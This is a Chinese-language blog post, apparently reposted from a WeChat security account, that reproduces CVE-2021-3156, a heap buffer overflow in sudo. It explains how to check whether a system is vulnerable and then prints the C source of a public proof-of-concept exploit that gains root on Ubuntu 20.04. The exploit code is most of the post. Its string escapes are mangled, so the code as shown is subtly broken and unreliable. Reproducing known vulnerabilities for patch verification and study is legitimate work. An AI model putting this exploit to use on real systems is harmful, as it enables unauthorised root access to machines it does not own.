目前exp在ubuntu 20.04环境下稳定运行,其他linux发行版未测试
环境已经上传至百度云盘中,请关注公众号并后台回复sudo获取下载链接。虚拟机的用户名密码为 vagrant/unicodesec
CVE-2021-3156: 缓冲区溢出漏洞
在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得root权限。
用户可以使用如下方法进行自查: 以非root用户登录系统,并使用命令sudoedit -s /
-
如果响应一个以 sudoedit:开头的报错,那么表明存在漏洞。 -
如果响应一个以 usage:开头的报错,那么表明补丁已经生效。
复现过程
根目录中进入CVE-2021-3156文件夹中,执行make编译项目,随后执行sudo-hax-me-a-sandwich
过程如下图所示
exp代码如下
int main(int argc, char *argv[]) {
// CTF quality exploit below.
char *s_argv[]={
"sudoedit",
"-u", "root", "-s",
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",
"\",
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB123456\",
NULL
};
char *s_envp[]={
"\", "\", "\", "\", "\", "\", "\", "\",
"\", "\", "\", "\", "\", "\", "\", "\",
"\", "\", "\", "\", "\", "\", "\", "\",
"\", "\", "\", "\", "\", "\", "\", "\",
"\", "\", "\", "\", "\", "\", "\", "\",
"\", "\", "\", "\", "\", "\", "\", "\",
"\", "\", "\", "\", "\", "\", "\", "\",
"\", "\", "\", "\", "\", "\", "\",
"X/P0P_SH3LLZ_", "\",
"LC_MESSAGES=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
"LC_ALL=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
"LC_CTYPE=C.UTF-8@AAAAAAAAAAAAAA",
NULL
};
printf("**** CVE-2021-3156 PoC by blasty <[email protected]>n");
execve(SUDOEDIT_PATH, s_argv, s_envp);
return 0;
}
本文始发于微信公众号(宽字节安全):CVE-2021-3156 Sudo溢出漏洞 复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论